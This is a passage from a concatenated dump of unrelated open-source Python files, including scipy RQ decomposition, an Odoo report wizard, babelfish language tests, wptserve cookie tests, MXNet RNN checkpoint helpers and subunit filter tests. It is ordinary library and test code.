cQ, = safecall(gor_un_mqr, "gormqr/gunmqr", lr, trans, Q, tau, cc,
overwrite_c=overwrite_c)
if trans != "N":
cQ = cQ.T
if mode == "right":
cQ = cQ[:, :min(M, N)]
if onedim:
cQ = cQ.ravel()
return (cQ,) + raw[1:]
def rq(a, overwrite_a=False, lwork=None, mode='full', check_finite=True):
"""
Compute RQ decomposition of a matrix.
Calculate the decomposition ``A = R Q`` where Q is unitary/orthogonal
and R upper triangular.
Parameters
----------
a : (M, N) array_like
Matrix to be decomposed
overwrite_a : bool, optional
Whether data in a is overwritten (may improve performance)
lwork : int, optional
Work array size, lwork >= a.shape[1]. If None or -1, an optimal size
is computed.
mode : {'full', 'r', 'economic'}, optional
Determines what information is to be returned: either both Q and R
('full', default), only R ('r') or both Q and R but computed in
economy-size ('economic', see Notes).
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
R : float or complex ndarray
Of shape (M, N) or (M, K) for ``mode='economic'``. ``K = min(M, N)``.
Q : float or complex ndarray
Of shape (N, N) or (K, N) for ``mode='economic'``. Not returned
if ``mode='r'``.
Raises
------
LinAlgError
If decomposition fails.
Notes
-----
This is an interface to the LAPACK routines sgerqf, dgerqf, cgerqf, zgerqf,
sorgrq, dorgrq, cungrq and zungrq.
If ``mode=economic``, the shapes of Q and R are (K, N) and (M, K) instead
of (N,N) and (M,N), with ``K=min(M,N)``.
Examples
--------
>>> from scipy import linalg
>>> from numpy import random, dot, allclose
>>> a = random.randn(6, 9)
>>> r, q = linalg.rq(a)
>>> allclose(a, dot(r, q))
True
>>> r.shape, q.shape
((6, 9), (9, 9))
>>> r2 = linalg.rq(a, mode='r')
>>> allclose(r, r2)
True
>>> r3, q3 = linalg.rq(a, mode='economic')
>>> r3.shape, q3.shape
((6, 6), (6, 9))
"""
if mode not in ['full', 'r', 'economic']:
raise ValueError(
"Mode argument should be one of ['full', 'r', 'economic']")
if check_finite:
a1 = numpy.asarray_chkfinite(a)
else:
a1 = numpy.asarray(a)
if len(a1.shape) != 2:
raise ValueError('expected matrix')
M, N = a1.shape
overwrite_a = overwrite_a or (_datacopied(a1, a))
gerqf, = get_lapack_funcs(('gerqf',), (a1,))
rq, tau = safecall(gerqf, 'gerqf', a1, lwork=lwork,
overwrite_a=overwrite_a)
if not mode == 'economic' or N < M:
R = numpy.triu(rq, N-M)
else:
R = numpy.triu(rq[-M:, -M:])
if mode == 'r':
return R
gor_un_grq, = get_lapack_funcs(('orgrq',), (rq,))
if N < M:
Q, = safecall(gor_un_grq, "gorgrq/gungrq", rq[-N:], tau, lwork=lwork,
overwrite_a=1)
elif mode == 'economic':
Q, = safecall(gor_un_grq, "gorgrq/gungrq", rq, tau, lwork=lwork,
overwrite_a=1)
else:
rq1 = numpy.empty((N, N), dtype=rq.dtype)
rq1[-M:] = rq
Q, = safecall(gor_un_grq, "gorgrq/gungrq", rq1, tau, lwork=lwork,
overwrite_a=1)
return R, Q
|
cloud9UG/odoo
|
refs/heads/8.0
|
addons/l10n_fr/wizard/fr_report_compute_resultant.py
|
374
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2008 JAILLET Simon - CrysaLEAD - www.crysalead.fr
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
from openerp.osv import fields, osv
class account_cdr_report(osv.osv_memory):
_name = 'account.cdr.report'
_description = 'Account CDR Report'
def _get_defaults(self, cr, uid, context=None):
fiscalyear_id = self.pool.get('account.fiscalyear').find(cr, uid)
return fiscalyear_id
_columns = {
'fiscalyear_id': fields.many2one('account.fiscalyear', 'Fiscal Year', required=True),
}
_defaults = {
'fiscalyear_id': _get_defaults
}
def print_cdr_report(self, cr, uid, ids, context=None):
active_ids = context.get('active_ids', [])
data = {}
data['form'] = {}
data['ids'] = active_ids
data['form']['fiscalyear_id'] = self.browse(cr, uid, ids)[0].fiscalyear_id.id
return self.pool['report'].get_action(
cr, uid, ids, 'l10n_fr.report_l10nfrresultat', data=data, context=context
)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
ch1huizong/dj
|
refs/heads/master
|
onlineshop/myshop/orders/tests.py
|
24123
|
from django.test import TestCase
# Create your tests here.
|
sergeysynergy/graph
|
refs/heads/master
|
django/zcore/tests.py
|
24123
|
from django.test import TestCase
# Create your tests here.
|
roderickvd/nzbToMedia
|
refs/heads/master
|
libs/babelfish/tests.py
|
40
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2013 the BabelFish authors. All rights reserved.
# Use of this source code is governed by the 3-clause BSD license
# that can be found in the LICENSE file.
#
from __future__ import unicode_literals
import re
import sys
import pickle
from unittest import TestCase, TestSuite, TestLoader, TextTestRunner
from pkg_resources import resource_stream # @UnresolvedImport
from babelfish import (LANGUAGES, Language, Country, Script, language_converters, country_converters,
LanguageReverseConverter, LanguageConvertError, LanguageReverseError, CountryReverseError)
if sys.version_info[:2] <= (2, 6):
_MAX_LENGTH = 80
def safe_repr(obj, short=False):
try:
result = repr(obj)
except Exception:
result = object.__repr__(obj)
if not short or len(result) < _MAX_LENGTH:
return result
return result[:_MAX_LENGTH] + ' [truncated]...'
class _AssertRaisesContext(object):
"""A context manager used to implement TestCase.assertRaises* methods."""
def __init__(self, expected, test_case, expected_regexp=None):
self.expected = expected
self.failureException = test_case.failureException
self.expected_regexp = expected_regexp
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
if exc_type is None:
try:
exc_name = self.expected.__name__
except AttributeError:
exc_name = str(self.expected)
raise self.failureException(
"{0} not raised".format(exc_name))
if not issubclass(exc_type, self.expected):
# let unexpected exceptions pass through
return False
self.exception = exc_value # store for later retrieval
if self.expected_regexp is None:
return True
expected_regexp = self.expected_regexp
if isinstance(expected_regexp, basestring):
expected_regexp = re.compile(expected_regexp)
if not expected_regexp.search(str(exc_value)):
raise self.failureException('"%s" does not match "%s"' %
(expected_regexp.pattern, str(exc_value)))
return True
class _Py26FixTestCase(object):
def assertIsNone(self, obj, msg=None):
"""Same as self.assertTrue(obj is None), with a nicer default message."""
if obj is not None:
standardMsg = '%s is not None' % (safe_repr(obj),)
self.fail(self._formatMessage(msg, standardMsg))
def assertIsNotNone(self, obj, msg=None):
"""Included for symmetry with assertIsNone."""
if obj is None:
standardMsg = 'unexpectedly None'
self.fail(self._formatMessage(msg, standardMsg))
def assertIn(self, member, container, msg=None):
"""Just like self.assertTrue(a in b), but with a nicer default message."""
if member not in container:
standardMsg = '%s not found in %s' % (safe_repr(member),
safe_repr(container))
self.fail(self._formatMessage(msg, standardMsg))
def assertNotIn(self, member, container, msg=None):
"""Just like self.assertTrue(a not in b), but with a nicer default message."""
if member in container:
standardMsg = '%s unexpectedly found in %s' % (safe_repr(member),
safe_repr(container))
self.fail(self._formatMessage(msg, standardMsg))
def assertIs(self, expr1, expr2, msg=None):
"""Just like self.assertTrue(a is b), but with a nicer default message."""
if expr1 is not expr2:
standardMsg = '%s is not %s' % (safe_repr(expr1),
safe_repr(expr2))
self.fail(self._formatMessage(msg, standardMsg))
def assertIsNot(self, expr1, expr2, msg=None):
"""Just like self.assertTrue(a is not b), but with a nicer default message."""
if expr1 is expr2:
standardMsg = 'unexpectedly identical: %s' % (safe_repr(expr1),)
self.fail(self._formatMessage(msg, standardMsg))
else:
class _Py26FixTestCase(object):
pass
class TestScript(TestCase, _Py26FixTestCase):
def test_wrong_script(self):
self.assertRaises(ValueError, lambda: Script('Azer'))
def test_eq(self):
self.assertEqual(Script('Latn'), Script('Latn'))
def test_ne(self):
self.assertNotEqual(Script('Cyrl'), Script('Latn'))
def test_hash(self):
self.assertEqual(hash(Script('Hira')), hash('Hira'))
def test_pickle(self):
self.assertEqual(pickle.loads(pickle.dumps(Script('Latn'))), Script('Latn'))
class TestCountry(TestCase, _Py26FixTestCase):
def test_wrong_country(self):
self.assertRaises(ValueError, lambda: Country('ZZ'))
def test_eq(self):
self.assertEqual(Country('US'), Country('US'))
def test_ne(self):
self.assertNotEqual(Country('GB'), Country('US'))
self.assertIsNotNone(Country('US'))
def test_hash(self):
self.assertEqual(hash(Country('US')), hash('US'))
def test_pickle(self):
for country in [Country('GB'), Country('US')]:
self.assertEqual(pickle.loads(pickle.dumps(country)), country)
def test_converter_name(self):
self.assertEqual(Country('US').name, 'UNITED STATES')
self.assertEqual(Country.fromname('UNITED STATES'), Country('US'))
self.assertEqual(Country.fromcode('UNITED STATES', 'name'), Country('US'))
self.assertRaises(CountryReverseError, lambda: Country.fromname('ZZZZZ'))
self.assertEqual(len(country_converters['name'].codes), 249)
class TestLanguage(TestCase, _Py26FixTestCase):
def test_languages(self):
self.assertEqual(len(LANGUAGES), 7874)
def test_wrong_language(self):
self.assertRaises(ValueError, lambda: Language('zzz'))
def test_unknown_language(self):
self.assertEqual(Language('zzzz', unknown='und'), Language('und'))
def test_converter_alpha2(self):
self.assertEqual(Language('eng').alpha2, 'en')
self.assertEqual(Language.fromalpha2('en'), Language('eng'))
self.assertEqual(Language.fromcode('en', 'alpha2'), Language('eng'))
self.assertRaises(LanguageReverseError, lambda: Language.fromalpha2('zz'))
self.assertRaises(LanguageConvertError, lambda: Language('aaa').alpha2)
self.assertEqual(len(language_converters['alpha2'].codes), 184)
def test_converter_alpha3b(self):
self.assertEqual(Language('fra').alpha3b, 'fre')
self.assertEqual(Language.fromalpha3b('fre'), Language('fra'))
self.assertEqual(Language.fromcode('fre', 'alpha3b'), Language('fra'))
self.assertRaises(LanguageReverseError, lambda: Language.fromalpha3b('zzz'))
self.assertRaises(LanguageConvertError, lambda: Language('aaa').alpha3b)
self.assertEqual(len(language_converters['alpha3b'].codes), 418)
def test_converter_alpha3t(self):
self.assertEqual(Language('fra').alpha3t, 'fra')
self.assertEqual(Language.fromalpha3t('fra'), Language('fra'))
self.assertEqual(Language.fromcode('fra', 'alpha3t'), Language('fra'))
self.assertRaises(LanguageReverseError, lambda: Language.fromalpha3t('zzz'))
self.assertRaises(LanguageConvertError, lambda: Language('aaa').alpha3t)
self.assertEqual(len(language_converters['alpha3t'].codes), 418)
def test_converter_name(self):
self.assertEqual(Language('eng').name, 'English')
self.assertEqual(Language.fromname('English'), Language('eng'))
self.assertEqual(Language.fromcode('English', 'name'), Language('eng'))
self.assertRaises(LanguageReverseError, lambda: Language.fromname('Zzzzzzzzz'))
self.assertEqual(len(language_converters['name'].codes), 7874)
def test_converter_scope(self):
self.assertEqual(language_converters['scope'].codes, set(['I', 'S', 'M']))
self.assertEqual(Language('eng').scope, 'individual')
self.assertEqual(Language('und').scope, 'special')
def test_converter_type(self):
self.assertEqual(language_converters['type'].codes, set(['A', 'C', 'E', 'H', 'L', 'S']))
self.assertEqual(Language('eng').type, 'living')
self.assertEqual(Language('und').type, 'special')
def test_converter_opensubtitles(self):
self.assertEqual(Language('fra').opensubtitles, Language('fra').alpha3b)
self.assertEqual(Language('por', 'BR').opensubtitles, 'pob')
self.assertEqual(Language.fromopensubtitles('fre'), Language('fra'))
self.assertEqual(Language.fromopensubtitles('pob'), Language('por', 'BR'))
self.assertEqual(Language.fromopensubtitles('pb'), Language('por', 'BR'))
# Montenegrin is not recognized as an ISO language (yet?) but for now it is
# unofficially accepted as Serbian from Montenegro
self.assertEqual(Language.fromopensubtitles('mne'), Language('srp', 'ME'))
self.assertEqual(Language.fromcode('pob', 'opensubtitles'), Language('por', 'BR'))
self.assertRaises(LanguageReverseError, lambda: Language.fromopensubtitles('zzz'))
self.assertRaises(LanguageConvertError, lambda: Language('aaa').opensubtitles)
self.assertEqual(len(language_converters['opensubtitles'].codes), 606)
# test with all the LANGUAGES from the opensubtitles api
# downloaded from: http://www.opensubtitles.org/addons/export_languages.php
f = resource_stream('babelfish', 'data/opensubtitles_languages.txt')
f.readline()
for l in f:
idlang, alpha2, _, upload_enabled, web_enabled = l.decode('utf-8').strip().split('\t')
if not int(upload_enabled) and not int(web_enabled):
# do not test LANGUAGES that are too esoteric / not widely available
continue
self.assertEqual(Language.fromopensubtitles(idlang).opensubtitles, idlang)
if alpha2:
self.assertEqual(Language.fromopensubtitles(idlang), Language.fromopensubtitles(alpha2))
f.close()
def test_fromietf_country_script(self):
language = Language.fromietf('fra-FR-Latn')
self.assertEqual(language.alpha3, 'fra')
self.assertEqual(language.country, Country('FR'))
self.assertEqual(language.script, Script('Latn'))
def test_fromietf_country_no_script(self):
language = Language.fromietf('fra-FR')
self.assertEqual(language.alpha3, 'fra')
self.assertEqual(language.country, Country('FR'))
self.assertIsNone(language.script)
def test_fromietf_no_country_no_script(self):
language = Language.fromietf('fra-FR')
self.assertEqual(language.alpha3, 'fra')
self.assertEqual(language.country, Country('FR'))
self.assertIsNone(language.script)
def test_fromietf_no_country_script(self):
language = Language.fromietf('fra-Latn')
self.assertEqual(language.alpha3, 'fra')
self.assertIsNone(language.country)
self.assertEqual(language.script, Script('Latn'))
def test_fromietf_alpha2_language(self):
language = Language.fromietf('fr-Latn')
self.assertEqual(language.alpha3, 'fra')
self.assertIsNone(language.country)
self.assertEqual(language.script, Script('Latn'))
def test_fromietf_wrong_language(self):
self.assertRaises(ValueError, lambda: Language.fromietf('xyz-FR'))
def test_fromietf_wrong_country(self):
self.assertRaises(ValueError, lambda: Language.fromietf('fra-YZ'))
def test_fromietf_wrong_script(self):
self.assertRaises(ValueError, lambda: Language.fromietf('fra-FR-Wxyz'))
def test_eq(self):
self.assertEqual(Language('eng'), Language('eng'))
def test_ne(self):
self.assertNotEqual(Language('fra'), Language('eng'))
self.assertIsNotNone(Language('fra'))
def test_nonzero(self):
self.assertFalse(bool(Language('und')))
self.assertTrue(bool(Language('eng')))
def test_language_hasattr(self):
self.assertTrue(hasattr(Language('fra'), 'alpha3'))
self.assertTrue(hasattr(Language('fra'), 'alpha2'))
self.assertFalse(hasattr(Language('bej'), 'alpha2'))
def test_country(self):
self.assertEqual(Language('por', 'BR').country, Country('BR'))
self.assertEqual(Language('eng', Country('US')).country, Country('US'))
def test_eq_with_country(self):
self.assertEqual(Language('eng', 'US'), Language('eng', Country('US')))
def test_ne_with_country(self):
self.assertNotEqual(Language('eng', 'US'), Language('eng', Country('GB')))
def test_script(self):
self.assertEqual(Language('srp', script='Latn').script, Script('Latn'))
self.assertEqual(Language('srp', script=Script('Cyrl')).script, Script('Cyrl'))
def test_eq_with_script(self):
self.assertEqual(Language('srp', script='Latn'), Language('srp', script=Script('Latn')))
def test_ne_with_script(self):
self.assertNotEqual(Language('srp', script='Latn'), Language('srp', script=Script('Cyrl')))
def test_eq_with_country_and_script(self):
self.assertEqual(Language('srp', 'SR', 'Latn'), Language('srp', Country('SR'), Script('Latn')))
def test_ne_with_country_and_script(self):
self.assertNotEqual(Language('srp', 'SR', 'Latn'), Language('srp', Country('SR'), Script('Cyrl')))
def test_hash(self):
self.assertEqual(hash(Language('fra')), hash('fr'))
self.assertEqual(hash(Language('ace')), hash('ace'))
self.assertEqual(hash(Language('por', 'BR')), hash('pt-BR'))
self.assertEqual(hash(Language('srp', script='Cyrl')), hash('sr-Cyrl'))
self.assertEqual(hash(Language('eng', 'US', 'Latn')), hash('en-US-Latn'))
def test_pickle(self):
for lang in [Language('fra'),
Language('eng', 'US'),
Language('srp', script='Latn'),
Language('eng', 'US', 'Latn')]:
self.assertEqual(pickle.loads(pickle.dumps(lang)), lang)
def test_str(self):
self.assertEqual(Language.fromietf(str(Language('eng', 'US', 'Latn'))), Language('eng', 'US', 'Latn'))
self.assertEqual(Language.fromietf(str(Language('fra', 'FR'))), Language('fra', 'FR'))
self.assertEqual(Language.fromietf(str(Language('bel'))), Language('bel'))
def test_register_converter(self):
class TestConverter(LanguageReverseConverter):
def __init__(self):
self.to_test = {'fra': 'test1', 'eng': 'test2'}
self.from_test = {'test1': 'fra', 'test2': 'eng'}
def convert(self, alpha3, country=None, script=None):
if alpha3 not in self.to_test:
raise LanguageConvertError(alpha3, country, script)
return self.to_test[alpha3]
def reverse(self, test):
if test not in self.from_test:
raise LanguageReverseError(test)
return (self.from_test[test], None)
language = Language('fra')
self.assertFalse(hasattr(language, 'test'))
language_converters['test'] = TestConverter()
self.assertTrue(hasattr(language, 'test'))
self.assertIn('test', language_converters)
self.assertEqual(Language('fra').test, 'test1')
self.assertEqual(Language.fromtest('test2').alpha3, 'eng')
del language_converters['test']
self.assertNotIn('test', language_converters)
self.assertRaises(KeyError, lambda: Language.fromtest('test1'))
self.assertRaises(AttributeError, lambda: Language('fra').test)
def suite():
suite = TestSuite()
suite.addTest(TestLoader().loadTestsFromTestCase(TestScript))
suite.addTest(TestLoader().loadTestsFromTestCase(TestCountry))
suite.addTest(TestLoader().loadTestsFromTestCase(TestLanguage))
return suite
if __name__ == '__main__':
TextTestRunner().run(suite())
|
maferelo/saleor
|
refs/heads/master
|
saleor/extensions/error_codes.py
|
2
|
from enum import Enum
class ExtensionsErrorCode(Enum):
GRAPHQL_ERROR = "graphql_error"
INVALID = "invalid"
PLUGIN_MISCONFIGURED = "plugin-misconfigured"
NOT_FOUND = "not_found"
REQUIRED = "required"
UNIQUE = "unique"
|
julienperret/TidyCity
|
refs/heads/master
|
tidy_city_dialog.py
|
1
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
TidyCityDialog
A QGIS plugin
A simple QGIS python plugin for building tidy cities.
-------------------
begin : 2016-11-30
git sha : $Format:%H$
copyright : (C) 2016 by IGN
email : julien.perret@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import os
from PyQt5 import QtGui, uic
from PyQt5.QtWidgets import QDialog
FORM_CLASS, _ = uic.loadUiType(os.path.join(
os.path.dirname(__file__), 'tidy_city_dialog_base.ui'))
class TidyCityDialog(QDialog, FORM_CLASS):
def __init__(self, parent=None):
"""Constructor."""
super(TidyCityDialog, self).__init__(parent)
# Set up the user interface from Designer.
# After setupUI you can access any designer object by doing
# self.<objectname>, and you can use autoconnect slots - see
# http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html
# #widgets-and-dialogs-with-auto-connect
self.setupUi(self)
|
doanguyen/lasotuvi
|
refs/heads/master
|
lasotuvi/ThienBan.py
|
1
|
# -*- coding: utf-8 -*-
"""
(c) 2016 doanguyen <dungnv2410@gmail.com>.
"""
from lasotuvi.AmDuong import (canChiNgay, diaChi, ngayThangNam, ngayThangNamCanChi,
nguHanh, nguHanhNapAm, thienCan, timCuc, sinhKhac)
import time
from lasotuvi.Lich_HND import jdFromDate
class lapThienBan(object):
def __init__(self, nn, tt, nnnn, gioSinh, gioiTinh, ten, diaBan,
duongLich=True, timeZone=7):
super(lapThienBan, self).__init__()
self.gioiTinh = 1 if gioiTinh == 1 else -1
self.namNu = "Nam" if gioiTinh == 1 else "Nữ"
chiGioSinh = diaChi[gioSinh]
canGioSinh = ((jdFromDate(nn, tt, nnnn) - 1) * 2 % 10 + gioSinh) % 10
if canGioSinh == 0:
canGioSinh = 10
self.chiGioSinh = chiGioSinh
self.canGioSinh = canGioSinh
self.gioSinh = "{} {}".format(thienCan[canGioSinh]['tenCan'],
chiGioSinh['tenChi'])
self.timeZone = timeZone
self.today = time.strftime("%d/%m/%Y")
self.ngayDuong, self.thangDuong, self.namDuong, self.ten = \
nn, tt, nnnn, ten
if duongLich is True:
self.ngayAm, self.thangAm, self.namAm, self.thangNhuan = \
ngayThangNam(self.ngayDuong, self.thangDuong, self.namDuong,
True, self.timeZone)
else:
self.ngayAm, self.thangAm, self.namAm = self.ngayDuong,\
self.thangDuong, self.namDuong
self.canThang, self.canNam, self.chiNam = \
ngayThangNamCanChi(self.ngayAm, self.thangAm,
self.namAm, False, self.timeZone)
self.chiThang = self.thangAm
self.canThangTen = thienCan[self.canThang]['tenCan']
self.canNamTen = thienCan[self.canNam]['tenCan']
self.chiThangTen = diaChi[self.thangAm]['tenChi']
self.chiNamTen = diaChi[self.chiNam]['tenChi']
self.canNgay, self.chiNgay = canChiNgay(
self.ngayDuong, self.thangDuong, self.namDuong,
duongLich, timeZone)
self.canNgayTen = thienCan[self.canNgay]['tenCan']
self.chiNgayTen = diaChi[self.chiNgay]['tenChi']
cungAmDuong = 1 if (diaBan.cungMenh % 2 == 1) else -1
self.amDuongNamSinh = "Dương" if (self.chiNam % 2 == 1) else "Âm"
if (cungAmDuong * self.gioiTinh == 1):
self.amDuongMenh = "Âm dương thuận lý"
else:
self.amDuongMenh = "Âm dương nghịch lý"
cuc = timCuc(diaBan.cungMenh, self.canNam)
self.hanhCuc = nguHanh(cuc)['id']
self.tenCuc = nguHanh(cuc)['tenCuc']
self.menhChu = diaChi[self.canNam]['menhChu']
self.thanChu = diaChi[self.canNam]['thanChu']
self.menh = nguHanhNapAm(self.chiNam, self.canNam)
menhId = nguHanh(self.menh)['id']
menhCuc = sinhKhac(menhId, self.hanhCuc)
if menhCuc == 1:
self.sinhKhac = "Bản Mệnh sinh Cục"
elif menhCuc == -1:
self.sinhKhac = "Bản Mệnh khắc Cục"
elif menhCuc == -1j:
self.sinhKhac = "Cục khắc Bản Mệnh"
elif menhCuc == 1j:
self.sinhKhac = "Cục sinh Bản mệnh"
else:
self.sinhKhac = "Cục hòa Bản Mệnh"
self.banMenh = nguHanhNapAm(self.chiNam, self.canNam, True)
|
antworteffekt/EDeN
|
refs/heads/master
|
eden/converter/molecule/__init__.py
|
12
|
__author__ = "Fabrizio Costa, Bjoern Gruening"
__copyright__ = "Copyright 2014, Fabrizio Costa"
__credits__ = ["Fabrizio Costa", "Bjoern Gruening"]
__license__ = "GPL"
__version__ = "0.1"
__maintainer__ = "Fabrizio Costa"
__email__ = "costa@informatik.uni-freiburg.de"
__status__ = "Production"
|
birryree/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/tools/wptserve/tests/functional/test_cookies.py
|
109
|
import unittest
import wptserve
from .base import TestUsingServer
class TestResponseSetCookie(TestUsingServer):
def test_name_value(self):
@wptserve.handlers.handler
def handler(request, response):
response.set_cookie("name", "value")
return "Test"
route = ("GET", "/test/name_value", handler)
self.server.router.register(*route)
resp = self.request(route[1])
self.assertEqual(resp.info()["Set-Cookie"], "name=value; Path=/")
def test_unset(self):
@wptserve.handlers.handler
def handler(request, response):
response.set_cookie("name", "value")
response.unset_cookie("name")
return "Test"
route = ("GET", "/test/unset", handler)
self.server.router.register(*route)
resp = self.request(route[1])
self.assertTrue("Set-Cookie" not in resp.info())
def test_delete(self):
@wptserve.handlers.handler
def handler(request, response):
response.delete_cookie("name")
return "Test"
route = ("GET", "/test/delete", handler)
self.server.router.register(*route)
resp = self.request(route[1])
parts = dict(item.split("=") for
item in resp.info()["Set-Cookie"].split("; ") if item)
self.assertEqual(parts["name"], "")
self.assertEqual(parts["Path"], "/")
#Should also check that expires is in the past
class TestRequestCookies(TestUsingServer):
def test_set_cookie(self):
@wptserve.handlers.handler
def handler(request, response):
return request.cookies["name"].value
route = ("GET", "/test/set_cookie", handler)
self.server.router.register(*route)
resp = self.request(route[1], headers={"Cookie": "name=value"})
self.assertEqual(resp.read(), b"value")
if __name__ == '__main__':
unittest.main()
|
jiajiechen/mxnet
|
refs/heads/master
|
python/mxnet/rnn/rnn.py
|
44
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=too-many-arguments, no-member
"""Functions for constructing recurrent neural networks."""
import warnings
from ..model import save_checkpoint, load_checkpoint
from .rnn_cell import BaseRNNCell
def rnn_unroll(cell, length, inputs=None, begin_state=None, input_prefix='', layout='NTC'):
"""Deprecated. Please use cell.unroll instead"""
warnings.warn('rnn_unroll is deprecated. Please call cell.unroll directly.')
return cell.unroll(length=length, inputs=inputs, begin_state=begin_state,
input_prefix=input_prefix, layout=layout)
def save_rnn_checkpoint(cells, prefix, epoch, symbol, arg_params, aux_params):
"""Save checkpoint for model using RNN cells.
Unpacks weight before saving.
Parameters
----------
cells : RNNCell or list of RNNCells
The RNN cells used by this symbol.
prefix : str
Prefix of model name.
epoch : int
The epoch number of the model.
symbol : Symbol
The input symbol
arg_params : dict of str to NDArray
Model parameter, dict of name to NDArray of net's weights.
aux_params : dict of str to NDArray
Model parameter, dict of name to NDArray of net's auxiliary states.
Notes
-----
- ``prefix-symbol.json`` will be saved for symbol.
- ``prefix-epoch.params`` will be saved for parameters.
"""
if isinstance(cells, BaseRNNCell):
cells = [cells]
for cell in cells:
arg_params = cell.unpack_weights(arg_params)
save_checkpoint(prefix, epoch, symbol, arg_params, aux_params)
def load_rnn_checkpoint(cells, prefix, epoch):
"""Load model checkpoint from file.
Pack weights after loading.
Parameters
----------
cells : RNNCell or list of RNNCells
The RNN cells used by this symbol.
prefix : str
Prefix of model name.
epoch : int
Epoch number of model we would like to load.
Returns
-------
symbol : Symbol
The symbol configuration of computation network.
arg_params : dict of str to NDArray
Model parameter, dict of name to NDArray of net's weights.
aux_params : dict of str to NDArray
Model parameter, dict of name to NDArray of net's auxiliary states.
Notes
-----
- symbol will be loaded from ``prefix-symbol.json``.
- parameters will be loaded from ``prefix-epoch.params``.
"""
sym, arg, aux = load_checkpoint(prefix, epoch)
if isinstance(cells, BaseRNNCell):
cells = [cells]
for cell in cells:
arg = cell.pack_weights(arg)
return sym, arg, aux
def do_rnn_checkpoint(cells, prefix, period=1):
"""Make a callback to checkpoint Module to prefix every epoch.
unpacks weights used by cells before saving.
Parameters
----------
cells : RNNCell or list of RNNCells
The RNN cells used by this symbol.
prefix : str
The file prefix to checkpoint to
period : int
How many epochs to wait before checkpointing. Default is 1.
Returns
-------
callback : function
The callback function that can be passed as iter_end_callback to fit.
"""
period = int(max(1, period))
# pylint: disable=unused-argument
def _callback(iter_no, sym=None, arg=None, aux=None):
"""The checkpoint function."""
if (iter_no + 1) % period == 0:
save_rnn_checkpoint(cells, prefix, iter_no+1, sym, arg, aux)
return _callback
|
wimberosa/samba
|
refs/heads/master
|
lib/subunit/python/subunit/tests/test_subunit_filter.py
|
50
|
#
# subunit: extensions to python unittest to get test results from subprocesses.
# Copyright (C) 2005 Robert Collins <robertc@robertcollins.net>
#
# Licensed under either the Apache License, Version 2.0 or the BSD 3-clause
# license at the users choice. A copy of both licenses are available in the
# project source as Apache-2.0 and BSD. You may not use this file except in
# compliance with one of these two licences.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under these licenses is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# license you chose for the specific language governing permissions and
# limitations under that license.
#
"""Tests for subunit.TestResultFilter."""
from datetime import datetime
from subunit import iso8601
import unittest
from testtools import TestCase
from testtools.compat import _b, BytesIO, StringIO
from testtools.testresult.doubles import ExtendedTestResult
import subunit
from subunit.test_results import TestResultFilter
class TestTestResultFilter(TestCase):
"""Test for TestResultFilter, a TestResult object which filters tests."""
# While TestResultFilter works on python objects, using a subunit stream
# is an easy pithy way of getting a series of test objects to call into
# the TestResult, and as TestResultFilter is intended for use with subunit
# also has the benefit of detecting any interface skew issues.
example_subunit_stream = _b("""\
tags: global
test passed
success passed
test failed
tags: local
failure failed
test error
error error [
error details
]
test skipped
skip skipped
test todo
xfail todo
""")
def run_tests(self, result_filter, input_stream=None):
"""Run tests through the given filter.
:param result_filter: A filtering TestResult object.
:param input_stream: Bytes of subunit stream data. If not provided,
uses TestTestResultFilter.example_subunit_stream.
"""
if input_stream is None:
input_stream = self.example_subunit_stream
test = subunit.ProtocolTestCase(BytesIO(input_stream))
test.run(result_filter)
def test_default(self):
"""The default is to exclude success and include everything else."""
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result)
self.run_tests(result_filter)
# skips are seen as success by default python TestResult.
self.assertEqual(['error'],
[error[0].id() for error in filtered_result.errors])
self.assertEqual(['failed'],
[failure[0].id() for failure in
filtered_result.failures])
self.assertEqual(4, filtered_result.testsRun)
def test_exclude_errors(self):
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result, filter_error=True)
self.run_tests(result_filter)
# skips are seen as errors by default python TestResult.
self.assertEqual([], filtered_result.errors)
self.assertEqual(['failed'],
[failure[0].id() for failure in
filtered_result.failures])
self.assertEqual(3, filtered_result.testsRun)
def test_fixup_expected_failures(self):
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result,
fixup_expected_failures=set(["failed"]))
self.run_tests(result_filter)
self.assertEqual(['failed', 'todo'],
